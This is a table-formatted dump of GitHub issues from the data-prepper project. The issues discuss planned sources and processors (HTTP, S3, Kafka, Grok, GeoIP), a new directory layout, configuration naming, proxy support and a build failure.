issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 262k ⌀ | issue_title stringlengths 1 1.02k | issue_comments_url stringlengths 53 116 | issue_comments_count int64 0 2.49k | issue_created_at stringdate 1999-03-17 02:06:42 2025-06-23 11:41:49 | issue_updated_at stringdate 2000-02-10 06:43:57 2025-06-23 11:43:00 | issue_html_url stringlengths 34 97 | issue_github_id int64 132 3.17B | issue_number int64 1 215k |
|---|---|---|---|---|---|---|---|---|---|
[
"opensearch-project",
"data-prepper"
] | We will add a log-http-source Source plugin. This issue tracks the following features
* Boiler plate plugin code
* Add basic http server
* Add the http service that parse the incoming http request data and push to buffer
| Basic log HTTP source plugin | https://api.github.com/repos/opensearch-project/data-prepper/issues/308/comments | 1 | 2021-09-23T18:30:24Z | 2021-10-12T14:39:00Z | https://github.com/opensearch-project/data-prepper/issues/308 | 1,005,728,692 | 308 |
[
"opensearch-project",
"data-prepper"
] | ## What kind of business use case are you trying to solve? What are your requirements?
When ingesting logs into Opensearch for log analytics, users would like to use FluentBit as client application log data collector and expects Data-Prepper to receive log data from the FluentBit HTTP output, to transform and export data to Opensearch and Amazon Elasticsearch Service. Therefore we would like to present customers with a reliable FluentBit-DataPrepper-Opensearch pipeline that supports essential configuration and features for log data ingestion.
### What is the problem? What is preventing you from meeting the requirements?
Log HTTP source plugin is the receiver component of the [Data-Prepper log analytics pipeline](TODO: link for log ingestion RFC) workflow that communicates with FluentBit or other HTTP client and pass its received data downstream for further processing.
### What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
For data-prepper to receive log requests from FluentBit. We will implement a log HTTP source plugin that satisfies the following functional requirements:
* The plugin shall be capable of receiving request from FluentBit HTTP output plugin
* The plugin shall support json format from FluentBit HTTP output plugin.
* The plugin shall be configurable via YAML, similar as other existing source plugin in data-prepper
* The plugin shall push data to buffer in a unified format/model that
* facilitates the downstream preppers to do data-processing and transformation
* allows sinks to post to backend (Happy path).
* The plugin shall support host verification (TLS/SSL)
and performance requirements:
* The source plugin should manage thread pool counts, max connection counts, etc.
* The source plugin should throttle gracefully.
The http source plugin will include the following configuration parameters:
* port [int] (Optional) - The port number the source plugin is listening on, defaults to 2021.
* threadCount [int] (Optional) - The number of threads of http request executor thread pool. Default to 200 maximum threads.
* maxConnectionCount [int] (Optional) - The maximum allowed number of open connections. Default to 256.
* maxPendingRequests [int] (Optional) - Maximum number of incoming requests to store in a temporary task queue to be processed by worker threads. If a request arrives and the queue is full a 429 response will be returned immediately. Default to 1024
* ssl [bool] (Optional) - A boolean enables TLS/SSL security verification. Default to false
* certFilePath [String] (Optional): required when ssl flag is true.
* privateKeyFilePath [String] (Optional): required when ssl flag is true.
* privateKeyPassword [String] (Optional): required when ssl flag is true.
### What are your assumptions or prerequisites?
* The log data received from each http request is complete, i.e. for a multiline log, it is assumed to appear in a single request body instead of scattering around multiple requests. The assumption is based on FluentBit support for multiline filtering (https://docs.fluentbit.io/manual/pipeline/filters/multiline-stacktrace).
* For initial implementation, we will only deal with json content type. More codecs can be supported for enhancement later on.
### What are remaining open questions?
Batched log requests are submitted to the log http source's buffer w/o unwrapping the contents. Either has its pros and cons. We will address the data model, buffering behavior enhancement in a separate issue.
| [RFC] Log HTTP source Plugin | https://api.github.com/repos/opensearch-project/data-prepper/issues/307/comments | 1 | 2021-09-23T18:26:18Z | 2021-10-19T15:35:11Z | https://github.com/opensearch-project/data-prepper/issues/307 | 1,005,725,698 | 307 |
[
"opensearch-project",
"data-prepper"
] | This RFC introduces a proposal log ingestion in Data Prepper.
## What kind of business use case are you trying to solve? What are your requirements?
Users would like to support processing unstructured log data and storing structured output in OpenSearch.
*Use Cases:*
1. As a user, I want to be able to send data from FluentBit to Data Prepper to be processed before ingest into OpenSearch.
2. As a user, I want to convert unstructured log lines into a structured data format to ingest into OpenSearch.
### What is the problem? What is preventing you from meeting the requirements?
OpenSearch does not support the processing of unstructured data prior to saving the data to the index. There are numerous open source projects that support log ingestion however users are looking for an OpenSearch native
solution.
### What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
We will build HTTP/S source and Grok prepper plugins for Data Prepper. The HTTP/S plugin will support handling JSON data. We will build a new Grok prepper plugin to convert unstructured log lines into a structured data. We will build a new internal model to improve existing system performance and extend the OpenSearch sink to support structured log data.
[Image: FluentBit and Grok Plugin-Proposed System Overview.jpg]
#### HTTP Source Plugin
This plugin will be responsible for receiving requests from a user's FluentBit clients. This plugin will accept JSON formatted data initially with the flexibility to add other data formats in the future.
#### Internal Model
We will migrate away from using serialized JSON Strings as our internal data structure and define a new internal model. This will improve our system’s performance by removing excessive de/serialization (something we are currently experiencing as part of the trace pipelines) while keeping the current flexibility of our existing design.
#### Grok Prepper Plugin
The grok filtering functionality will be supported through a new grok prepper plugin. This prepper will process the collection of records from the FluentBit source plugin and filter according to the data prepper grok configuration.
#### Sink
The Data Prepper sink OpenSearch configuration will be extended to support structured log data as it currently only supports raw trace data and service map data.
### What are your assumptions or prerequisites?
We elected to support Fluent Bit and grok because they are widely used features for exporting and transforming log data. Other logs sources (FluentD, Beats, etc.) and processing functionality (dropping data, mutating, etc.) are out of scope at this time. We plan to expand support for other plugins based on feedback from the community.
Detailed designs for each sections will be proposed in separate RFCs.
This aligns with the most recent [blog post](https://opensearch.org/blog/releases/2021/09/data-prepper-roadmap/)
| [RFC] Log Ingestion for Data Prepper | https://api.github.com/repos/opensearch-project/data-prepper/issues/306/comments | 0 | 2021-09-23T15:13:21Z | 2021-10-19T14:24:01Z | https://github.com/opensearch-project/data-prepper/issues/306 | 1,005,554,303 | 306 |
[
"opensearch-project",
"data-prepper"
] | This RFC introduces a change from distributing Data Prepper as an uber-jar into a bundled directory structure. This approach is similar to how OpenSearch is distributed.
## What is the problem? What is preventing you from meeting the requirements?
Data Prepper distributes its code in a single uber-jar. We are planning work to support extending Data Prepper with custom plugins. This requires that we have a location for loading additional jar files which are not part of the uber-jar. Additionally, those plugins will be decoupled from data-prepper-core, which means we will have multiple jar files.
## What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
We propose distributing Data Prepper as a bundle which must be extracted into a directory structure. Data Prepper will now include a shell script for starting Java with the required classpath.
### User Experience
Users can deploy Data Prepper using the following options:
* Run the Docker container
* Install Bundled Distribution
* Build from source
#### Docker
Users deploying using Docker currently run the following commands.
```
docker pull opensearchproject/data-prepper:latest
docker run --name data-prepper --expose 21890 -v /full/path/to/pipelines.yaml:/usr/share/data-prepper/pipelines.yaml -v /full/path/to/data-prepper-config.yaml:/usr/share/data-prepper/data-prepper-config.yaml opensearchproject/data-prepper:latest
```
This proposal will slightly alter the process by changing linked files.
| Original Destination | Updated Destination |
| -------------------------------------------------- | --------------------------------------------------------- |
| /usr/share/data-prepper/pipelines.yaml | /usr/share/data-prepper/pipelines/pipelines.yaml |
| /usr/share/data-prepper/data-prepper-config.yaml | /usr/share/data-prepper/config/data-prepper-config.yaml |
The new commands will be:
```
docker pull opensearchproject/data-prepper:latest
docker run --name data-prepper --expose 21890 -v /full/path/to/pipelines.yaml:/usr/share/data-prepper/pipelines/pipelines.yaml -v /full/path/to/data-prepper-config.yaml:/usr/share/data-prepper/config/data-prepper-config.yaml opensearchproject/data-prepper:latest
```
#### Install Bundled Distribution
Users who installed our bundled distribution get a single uber-jar. Because this uber-jar has everything bundled, users run Data Prepper with the following command.
```
java -jar data-prepper-core-$VERSION.jar pipelines.yaml data-prepper-config.yaml
```
With the proposed update, users will install Data Prepper by performing steps similar to the following.
```
cd path/to/parent/directory
wget https://.../path/to/data-prepper-$VERSION.tar.gz
tar -xf data-prepper-$VERSION.tar.gz
```
Users can then run Data Prepper with the following commands.
```
cd data-prepper-$VERSION
bin/data-prepper
```
### Proposed Structure
Below is the initial directory structure which this change will introduce.
```
data-prepper-$VERSION/
bin/
data-prepper # Shell script to run Data Prepper on Linux/macOS
config/
data-prepper-config.yaml # The Data Prepper configuration file
log4j.properties # Logging configuration
pipelines/ # New directory for pipelines
trace-analytics.yaml
log-ingest.yaml
lib/
data-prepper-core.jar
... any other jar files
logs/ # Directory for log output
LICENSE
NOTICE
README.md
```
The proposed structure is similar to OpenSearch’s directory structure.
## What are your assumptions or prerequisites?
This RFC is limited in scope to the change to deploying with a directory structure. It does not include details for any features which depend on this.
Future features may expand the proposed directory structure. This approach does not attempt to foresee every possible directory.
Users still continue to provide the pipeline configuration file to Data Prepper as a command-line argument.
We expect that users only need to run Data Prepper on Linux. This proposal does not include a Windows script, which would likely be `bin/data-prepper.bat`. However, this could be included into this approach if requested.
Additional changes
In addition to deploying with a directory structure, this includes other related changes.
* Data Prepper can read the config file located at `config/data-prepper-config.yaml` rather than require it as a command-line argument.
* Data Prepper will expose the Log4j logging configuration file. This can be a clearer approach than requiring users to override a Java property.
* Data Prepper will write logs to the `logs/` directory.
# Tasks
- [x] #1655
- [x] Update archive structure to include script
- [x] Break apart `data-prepper-core` and deploy jar files in to `lib/` directory
- [x] Add `data-prepper-main`
- [x] #1728
- [x] #1736
- [x] Update smoke tests to copy configuration files and pipelines to the correct locations
- [x] #1762
- [x] #1785
- [x] #1795
| [RFC] Directory Structure for Data Prepper | https://api.github.com/repos/opensearch-project/data-prepper/issues/305/comments | 1 | 2021-09-22T14:52:48Z | 2022-09-29T18:25:53Z | https://github.com/opensearch-project/data-prepper/issues/305 | 1,004,395,250 | 305 |
[
"opensearch-project",
"data-prepper"
] | This is a subtask of the issue for a grok processor: https://github.com/opensearch-project/data-prepper/issues/256.
Basic pattern matching and capture functionality will be added to Grok Prepper using the existing java grok library: [https://github.com/thekrakken/java-grok](url) | Grok Prepper Basic Matching | https://api.github.com/repos/opensearch-project/data-prepper/issues/304/comments | 0 | 2021-09-21T17:52:08Z | 2021-10-18T20:29:01Z | https://github.com/opensearch-project/data-prepper/issues/304 | 1,002,960,073 | 304 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
It would be nice to be able to ingest firewall logs into OpenSearch for Obervability / SIEM related activities.
**Describe the solution you'd like**
A firewall log source plugin that accepts firewall logs and normalizes them.
**Describe alternatives you've considered (Optional)**
N/A
**Additional context**
See [this](https://discuss.opendistrocommunity.dev/t/cisco-asa-firewall-message-ingestion/4131) discussion for more detail.
| Firewall Log Ingest | https://api.github.com/repos/opensearch-project/data-prepper/issues/303/comments | 0 | 2021-09-21T17:09:23Z | 2022-04-19T19:34:35Z | https://github.com/opensearch-project/data-prepper/issues/303 | 1,002,889,435 | 303 |
[
"opensearch-project",
"data-prepper"
] | This is a subtask of the issue for a grok processor: [https://github.com/opensearch-project/data-prepper/issues/256](url).
Grok prepper field names and default values need to be set up, as well as the reading of the configuration and boilerplate for implementing AbstractPrepper. | Grok Prepper Configuration and Boilerplate | https://api.github.com/repos/opensearch-project/data-prepper/issues/301/comments | 0 | 2021-09-21T16:27:44Z | 2021-10-13T15:27:46Z | https://github.com/opensearch-project/data-prepper/issues/301 | 1,002,819,350 | 301 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
We, like thousands of other organisations, use proxies to filter outbound internet traffic. Without proxy support, `data-prepper` is unusable in our environment.
**Describe the solution you'd like**
Ideally, I could use `-Dhttp.proxyHost` and other Java proxy properties on the command line like most Java applications. Failing that, support via configuration (e.g., `data-prepper-config.yaml`) would be OK.
**Describe alternatives you've considered (Optional)**
There are no alternatives for our environment. I'm actually really surprised Amazon is recommending this tool without this basic feature. If this support exists, documentation for using it is nonexistant.
| Support Proxies | https://api.github.com/repos/opensearch-project/data-prepper/issues/300/comments | 5 | 2021-09-21T03:45:30Z | 2021-10-29T18:14:52Z | https://github.com/opensearch-project/data-prepper/issues/300 | 1,001,783,437 | 300 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
Data Prepper configuration names inconsistently use snake_case or lowerCamelCase. Configuring Data Prepper is clearer when the naming convention is consistent.
**Describe the solution you'd like**
Most importantly Data Prepper should have a consistent naming convention for configuration names. The standard we are proposing is snake_case. This convention is used by most of the existing properties. Thus, users will have fewer properties to reconfigure.
Data Prepper will need to:
* Have documentation clearly stating the standard.
* Provide a migration for names which are not in compliance. The first part of this migration is adding snake_case properties for each camelCase property. The existing camelCase properties will remain as deprecated properties. The next major release of Data Prepper will remove the cameCase versions.
**Tasks**
- [x] #2184
- [ ] #2202
- [x] #2203 | Configuration Consistency | https://api.github.com/repos/opensearch-project/data-prepper/issues/291/comments | 1 | 2021-09-17T22:08:41Z | 2023-02-27T19:58:30Z | https://github.com/opensearch-project/data-prepper/issues/291 | 999,753,902 | 291 |
[
"opensearch-project",
"data-prepper"
] | We are building support for customers to ingest and process log data through Data Prepper. We have identified a need for a plugin to output data from Data Prepper to Amazon Elasticsearch Service / OpenSearch (AES/OS). This task tracks the plan for a new Sink plugin to help output logging data from Data Prepper to OpenSearch. | Dataprepper Amazon Elasticsearch Service / OpenSearch Sink: | https://api.github.com/repos/opensearch-project/data-prepper/issues/260/comments | 0 | 2021-09-06T15:45:14Z | 2021-11-22T18:11:45Z | https://github.com/opensearch-project/data-prepper/issues/260 | 989,290,371 | 260 |
[
"opensearch-project",
"data-prepper"
] | The goal is take an existing Logstash configuration file that we can plug with Data Prepper and perform identical transformations on the data being ingested by the data prepper Log pipeline. | Logstash Template support: | https://api.github.com/repos/opensearch-project/data-prepper/issues/259/comments | 0 | 2021-09-06T15:45:09Z | 2021-11-15T20:22:00Z | https://github.com/opensearch-project/data-prepper/issues/259 | 989,290,317 | 259 |
[
"opensearch-project",
"data-prepper"
] | The getting started documentation needs to be better written and easier to understand so that getting data prepper up and running is very simple. | Rework getting started documentation | https://api.github.com/repos/opensearch-project/data-prepper/issues/258/comments | 0 | 2021-09-06T15:44:08Z | 2021-11-18T14:18:26Z | https://github.com/opensearch-project/data-prepper/issues/258 | 989,289,695 | 258 |
[
"opensearch-project",
"data-prepper"
] | We need to define the naming conventions that we will use to send data to the indices for log analysis in the observability plugin. | Define the log output naming conventions that will be used by Observability dashboard. | https://api.github.com/repos/opensearch-project/data-prepper/issues/257/comments | 0 | 2021-09-06T15:42:37Z | 2022-04-19T20:28:50Z | https://github.com/opensearch-project/data-prepper/issues/257 | 989,288,755 | 257 |
[
"opensearch-project",
"data-prepper"
] | null | Create a Grok processor. | https://api.github.com/repos/opensearch-project/data-prepper/issues/256/comments | 0 | 2021-09-06T15:27:42Z | 2021-11-15T20:20:20Z | https://github.com/opensearch-project/data-prepper/issues/256 | 989,279,113 | 256 |
[
"opensearch-project",
"data-prepper"
] | Accept data from FluentBit -- probably need to create an HTTP input source. | Accept data from FluentBit. | https://api.github.com/repos/opensearch-project/data-prepper/issues/255/comments | 1 | 2021-09-06T15:26:51Z | 2021-10-13T15:27:34Z | https://github.com/opensearch-project/data-prepper/issues/255 | 989,278,557 | 255 |
[
"opensearch-project",
"data-prepper"
] | Data Prepper can receive events from Kafka using a source which acts as a Kafka consumer.
This source should support most or all of the [consumer configurations](https://kafka.apache.org/25/documentation.html#consumerconfigs).
It should be able to support deserializing objects directly into Events. With the `StringDeserializer` it can create an Event with a single field, say `message` with the string as the value. It could possible have a JSON-based deserializer which maps JSON data directly into the fields of the Event. | Accept data from Kafka | https://api.github.com/repos/opensearch-project/data-prepper/issues/254/comments | 3 | 2021-09-06T15:25:31Z | 2023-08-16T21:03:39Z | https://github.com/opensearch-project/data-prepper/issues/254 | 989,277,671 | 254 |
[
"opensearch-project",
"data-prepper"
] | Provide a new processor which can enrich Data Prepper events with location information using a provided IP address.
The minimal configuration is to provide a `source_key` with the JSON Pointer key path.
```
processor:
- geoip:
source_key: "peer/ip"
```
Additionally, this plugin should be able to use either a MaxMind [GeoIP Lite2](https://dev.maxmind.com/geoip/geolite2-free-geolocation-data?lang=en) database or the [GeoIP2 Commercial Licensing](https://www.maxmind.com/en/solutions/geoip2-enterprise-product-suite/commercial-licensing) database. The Data Prepper author must provide information for configuring the commercial license.
The pipeline author can also specify an optional `target_key` property to specify where the location fields are written. By default, this will be the root of the event.
### Example 1 - Minimal Configuration
```
processor:
- geoip:
source_key: "peer/ip"
```
Input Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
```
Output Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
"country" : "United States"
"city_name" : "Seattle"
"latitude" : 47.64097
"longitude" : 122.25894
"zip_code" : "98115"
```
### Example 2 - Target Key
```
processor:
- geoip:
source_key: "peer/ip"
target_key: "location"
```
Input Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
```
Output Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"location" : {
"status" : "success"
"country" : "United States"
"city_name" : "Seattle"
"latitude" : "47.64097"
"longitude" : "122.25894"
"zip_code" : "98115"
}
```
- [x] #3941
- [x] #3942
| Add a GeoIP processor. | https://api.github.com/repos/opensearch-project/data-prepper/issues/253/comments | 4 | 2021-09-06T15:25:26Z | 2024-03-21T21:05:57Z | https://github.com/opensearch-project/data-prepper/issues/253 | 989,277,610 | 253 |
[
"opensearch-project",
"data-prepper"
] | Support ingest of OTel log data.
Specification: https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/logs/overview.md | Accept OTel log data from the OTell Collector | https://api.github.com/repos/opensearch-project/data-prepper/issues/252/comments | 1 | 2021-09-06T15:24:28Z | 2023-01-28T15:22:33Z | https://github.com/opensearch-project/data-prepper/issues/252 | 989,276,886 | 252 |
[
"opensearch-project",
"data-prepper"
] | ## Use-Case
Many users have external systems which write their logs to Amazon S3. These users want to use OpenSearch to analyze these logs. Data Prepper is an ingestion tool which can aid teams in extracting these logs for S3 and sending them to OpenSearch or elsewhere.
This proposal is to receive events from S3 notifications, read the object from S3, and create log lines for these.
## Basic Configuration
This plugin will be a single source plugin which:
* Polls a configured SQS standard queue which should hold S3 Event messages.
* Reads S3 objects which the message indicates as created.
* Uses a configured codec to parse the S3 object into Log Events.
* Writes the Log Events into the Data Prepper buffer.
The following example shows what a basic configure would look like.
```
source:
s3:
notification_type: sqs
sqs:
queue_url: "https://sqs.us-east-2.amazonaws.com/123456789012/MyS3EventQueue"
codec:
single-line:
processor:
grok:
match:
message: [ "%{COMMONAPACHELOG}" ]
```
## Detailed Process
The S3 Source will start a new thread for reading from S3. (The number of threads can be configured).
This thread will perform the following steps repeatedly until shutdown
1. Use the SQS `ReceiveMessage` API to receive messages from SQS.
2. For each Message from SQS, it will:
a. Parse the Message as an S3Event.
b. Download the S3 Object which the S3Event indicates was created.
c. Decompress the object if configured to do so.
d. Parse the decompressed file using the configured `codec` into a list of `Log` `Event` objects.
e. Write the `Log` objects into the Data Prepper buffer.
3. Perform a `DeleteMessageBatch` with all of the messages which were successfully processed.
4. Repeat
### Error Handling
The S3 Source will suppress exceptions which occur during processing. Any Message which is not processed correctly will not be included in the `DeleteMessageBatch` request. Thus, the message will appear in the SQS again. Data Prepper expects that the SQS queue is correctly configured with a DLQ or MessageRetentionPeriod to prevent the SQS queue from filling up with invalid messages.
## Codecs
The S3 Source will use configurable codecs to support multiple data formats in the S3 objects. Initially, two codecs are planned:
1. `single-line` - This is used for logs which should be separated by a newline.
2. `json` - A codec for parsing JSON logs
### Single Line
The `single-line` codec has no configuration items.
Below is an example S3 object.
```
POST /search
POST /index
PUT /document/12345
```
With `single-line`, the S3 source will produce 3 Events, each with the following structure.
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "POST /search"
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "POST /index"
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "PUT /document/12345"
```
### JSON
The `json` codec supports reading a JSON file and will create Events for each JSON object in an array. This S3 plugin is starting with the expectation that the incoming JSON is formed as a large JSON array of JSON objects. Each JSON object in that array is an Event. Thus, this codec will find the first JSON array in the JSON. It will output the objects within that array as Events from the JSON.
Future iterations of this plugin could allow for more customization. One possibility is to use JSON Pointer. However, the first iteration should meet many use-cases and allows for streaming the JSON to support parsing large JSON objects.
Below is an example configuration. This configures the S3 Sink to read a JSON array from the `items` key.
```
s3:
codec:
json:
```
Given the following S3 Object:
```
{
"http_requests" : [
{ "status" : 200, "path" : "/search", "method" : "POST" },
{ "status" : 200, "path" : "/index", "method" : "POST" },
{ "status" : 200, "path" : "/document/12345", "method" : "PUT" }
]
}
```
The S3 source will output 3 Log events:
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/index", "method" : "POST" }
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/search", "method" : "POST" }
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/document/12345", "method" : "PUT" }
```
### Compression
The S3 Source will support three configurations for compression.
1. `none` - The object will be treated as uncompressed.
2. `gzip` - The object will be decompressed using the gzip decompression algorithm
3. `automatic` - The S3 Source will example the object key to guess if it is compressed or not. If the key ends with `.gz` the S3 Source will attempt to decompress it using gzip. It can support other heuristics to determine if the file is compressed in future iterations.
## Full Configuration Options
| Option | Type | Required | Description |
| ------------- | ------------- | ------------- | ------------- |
| notification_type | Enum: `sqs` | Yes | Only SQS is supported. SNS may be a future option |
| compression | Enum: `none`, `gzip`, `automatic` | No | Default is `none` |
| codec | Codec | Yes | See Codecs section above. |
| sqs.queue_url | String - URL | Yes | The queue URL of the SQS queue. |
| sqs.maximum_messages | Integer | No | Directly related to SQS input. Default is 10. |
| sqs.visibility_timeout | Duration | No | Directly related to SQS input. Default is TBD. |
| sqs.wait_time | Duration | No | Directly related to SQS input. Default is TBD. |
| sqs.poll_delay | Duration | No | An optional delay between iterations of the process. Default is 0 seconds. |
| sqs.thread_count | Integer | No | Number of threads polling S3. Default is 1. |
| region | String | Yes | The AWS Region. TBD. |
| sts_role_arn | String | No | Role used for accessing S3 and SQS |
| access_key_id | String | No | Static access to S3 and SQS |
| secret_key_id | String | No | Static access to S3 and SQS |
| buckets | String List | No | If provided, only read objects from the buckets provided in the list. |
| account_ids | String List | No | If provided, only read objects from the buckets owned by an accountId in this list. |
## S3 Events
The S3 Source will parse all SQS Messages according to the [S3 Event message structure](https://docs.aws.amazon.com/AmazonS3/latest/userguide/notification-content-structure.html).
The S3 Source will also parse out any event types which are not `s3:ObjectCreated:*`. These events will be silently ignored. That is, the S3 Source will remove them from the SQS Queue, and will not create an Events for them.
Additionally, this source will have an optional `buckets` and `account_ids` lists. If supplied by the pipeline author, Data Prepper will only read objects for S3 events which are part of that list. For the `buckets` list, only S3 buckets in the list are used. For the `account_ids` list, only buckets owned by accounts with matching Ids are used. If this list is not provided, Data Prepper will read from any bucket which is owned by the accountId of the SQS queue. Use of this list is optional.
## AWS Permissions Needed
The S3 Source will require the following permissions:
| Action | Resource |
| ------------- | ------------- |
| `s3:GetObject` | The S3 bucket and key path for any object needed |
| `sqs:ReceiveMessage` | The ARN of the SQS queue specified by `sqs.queue_url` |
| `sqs:DeleteMessageBatch ` | The ARN of the SQS queue specified by `sqs.queue_url` |
## Possible Future Enhancements
### Direct SNS Notification
The `notification_type` currently only supports SQS. Some teams may want Data Prepper to receive notifications directly from SNS and thus remove the need for an SQS queue.
The `notification_type` could support an `sns` value in the future.
### Additional Codecs
As needed, Data Prepper can support other codecs. Some possible candidates to consider are:
* Multi-line
* JSON List
## Metrics
- messagesReceived (Counter)
- messagesDeleted (Counter)
- messagesFailed (Counter)
- eventsCreated (Counter)
- requestsDuration (Timer)
## Not Included
* This proposal is focused only reading S3 objects starting with a notification. Thus any use-case for replay is not part of this scope. Also, use-cases for reading existing logs are not covered. These use-cases can have their own issue.
* Updated S3 objects are not part of the scope. This work will only support use-cases when a log file is written once.
* Configuration of SQS queue to receive SNS topics should be done externally. Data Prepper will not manage this.
## Tasks
- [x] #1423
- [x] #1424
- [x] #1425
- [x] #1433
- [x] #1434
- [x] #1435
- [x] #1461
- [x] #1462
- [x] #1463
- [x] #1464
- [x] #1501
- [x] ~#1500~ (Not for the initial feature release)
- [x] #1515 | Receive log data from S3 as a Source | https://api.github.com/repos/opensearch-project/data-prepper/issues/251/comments | 12 | 2021-09-06T15:24:24Z | 2022-06-23T12:41:11Z | https://github.com/opensearch-project/data-prepper/issues/251 | 989,276,837 | 251 |
[
"opensearch-project",
"data-prepper"
] | null | Accept data from the Elasticsearch Output Plugins | https://api.github.com/repos/opensearch-project/data-prepper/issues/250/comments | 0 | 2021-09-06T15:23:40Z | 2022-04-19T19:33:54Z | https://github.com/opensearch-project/data-prepper/issues/250 | 989,276,321 | 250 |
[
"opensearch-project",
"data-prepper"
] | Write a source that accepts data from the Logstash OpenSearch output plugin. | Accept data from the Logstash OpenSearch Output Plugin. | https://api.github.com/repos/opensearch-project/data-prepper/issues/249/comments | 0 | 2021-09-06T15:22:56Z | 2022-04-19T19:33:41Z | https://github.com/opensearch-project/data-prepper/issues/249 | 989,275,798 | 249 |
[
"opensearch-project",
"data-prepper"
] | ## Summary
This creates a new Data Prepper source which accepts data in the form of the [OpenSearch Bulk API](https://opensearch.org/docs/latest/api-reference/document-apis/bulk/).
## Configuration
```
source:
opensearch_api:
port: 9200
path_prefix: opensearch/
```
## Operations
The `_bulk` API supports:
* `index`
* `create`
* `update`
* `delete`
This source can do something similar to what the `dynamodb` source does. Specifically it should include the `opensearch_action` metadata.
## Sample
```
POST opensearch/_bulk
{ "index": { "_index": "movies", "_id": "tt1979320" } }
{ "title": "Rush", "year": 2013 }
```
The above request is the simplest case since it is an `index` request.
It creates an Event with data such as:
```
{ "_id": "tt1979320" "title": "Rush", "year": 2013 }
```
Additionally, the event will need metadata that we can use in the `opensearch` sink.
```
opensearch_action: "index"
opensearch_index: "movies"
opensearch_id: "tt1979320"
```
## Query parameters
The `_bulk` API supports a few query parameters. The source should also support most of these and provide some of them as metadata.
* `pipeline` -> Sets metadata: `opensearch_pipeline`
* `routing` -> Sets metadata: `opensearch_routing`
* `timeout` -> Configures an alternate timeout for the request in the source. This probably doesn't need to be provided downstream.
Some other parameters that we may wish to support:
* `refresh`
* `require_alias`
* `wait_for_active_shards`
Finally, we should not support these parameters as they are being deprecated.
* `type`
## Response
Being able to provide the `_bulk` API response may be more challenging. There are a few reasons:
1. Unless end-to-end acknowledgments are enabled, we won't have any knowledge of the writes.
2. Even when acknowledgments are enabled all the metadata needed in a typical response is still not available.
An initial version could provide responses that either have empty values (where appropriate) or use synthetic values. | OpenSearch Bulk API Source | https://api.github.com/repos/opensearch-project/data-prepper/issues/248/comments | 5 | 2021-09-06T15:20:48Z | 2024-10-11T16:59:25Z | https://github.com/opensearch-project/data-prepper/issues/248 | 989,274,312 | 248 |
[
"opensearch-project",
"data-prepper"
] | Currently I can't ingest metrics from my nodejs application using the OpenTelemetry node sdk, data-prepper does not support it.
Will be awesome if data-prepper could process the metrics collected by the OpenTelemetry collector so they can be ingested by OpenSearch.
An issue for this exists on the OpenDistro repo https://github.com/opendistro-for-elasticsearch/data-prepper/issues/669
| Support metrics ingestion | https://api.github.com/repos/opensearch-project/data-prepper/issues/242/comments | 4 | 2021-09-01T15:43:17Z | 2022-05-13T18:29:16Z | https://github.com/opensearch-project/data-prepper/issues/242 | 985,310,456 | 242 |
[
"opensearch-project",
"data-prepper"
] | Add backwards compatibility tests for the plugin to automate end-to-end upgrade paths for faster releases. Developer documentation for implementing bwc tests and hooking them to CI: https://github.com/opensearch-project/opensearch-plugins/blob/main/TESTING.md#backwards-compatibility-testing | Add backwards compatibility tests for automation | https://api.github.com/repos/opensearch-project/data-prepper/issues/200/comments | 7 | 2021-08-23T20:10:31Z | 2021-10-21T17:02:57Z | https://github.com/opensearch-project/data-prepper/issues/200 | 977,390,214 | 200 |
[
"opensearch-project",
"data-prepper"
] | Coming from https://github.com/opensearch-project/.github/issues/21.
The correct copyright for open-source projects in opensearch-project is "Copyright OpenSearch Contributors". Please correct any places that say otherwise, especially where it says copyright Amazon. Make sure NOTICE.txt and README match. See https://github.com/opensearch-project/.github/pull/24 for an example.
| Correct copyright notices to reflect Copyright OpenSearch Contributors | https://api.github.com/repos/opensearch-project/data-prepper/issues/189/comments | 3 | 2021-08-06T17:58:02Z | 2022-01-24T19:02:27Z | https://github.com/opensearch-project/data-prepper/issues/189 | 962,937,800 | 189 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
It would be nice to have a doc that tracks the above compatibility for each release of data-prepper.
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered (Optional)**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.
| Common docs for Data-Prepper/Elasticsearch/OpenSearch/opentelemetry version compatibility reference | https://api.github.com/repos/opensearch-project/data-prepper/issues/138/comments | 0 | 2021-06-14T16:27:48Z | 2022-04-19T20:28:32Z | https://github.com/opensearch-project/data-prepper/issues/138 | 920,579,347 | 138 |
[
"opensearch-project",
"data-prepper"
] | **Describe the bug**
A clear and concise description of what the bug is.
Gradlew build command is failing to the output jar. Looks like the issue is with the opensearch project inside data-prepper-plugins project. Following is the error:
FAILURE: Build failed with an exception.
* What went wrong:
A problem occurred configuring project ': opensearch project inside - data-prepper-plugins:opensearch'
> Could not resolve all artifacts for configuration ':data-prepper-plugins:opensearch:classpath'.
> Could not find org.opensearch.gradle:build-tools:1.0.0-alpha2.
Searched in the following locations:
- https://plugins.gradle.org/m2/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
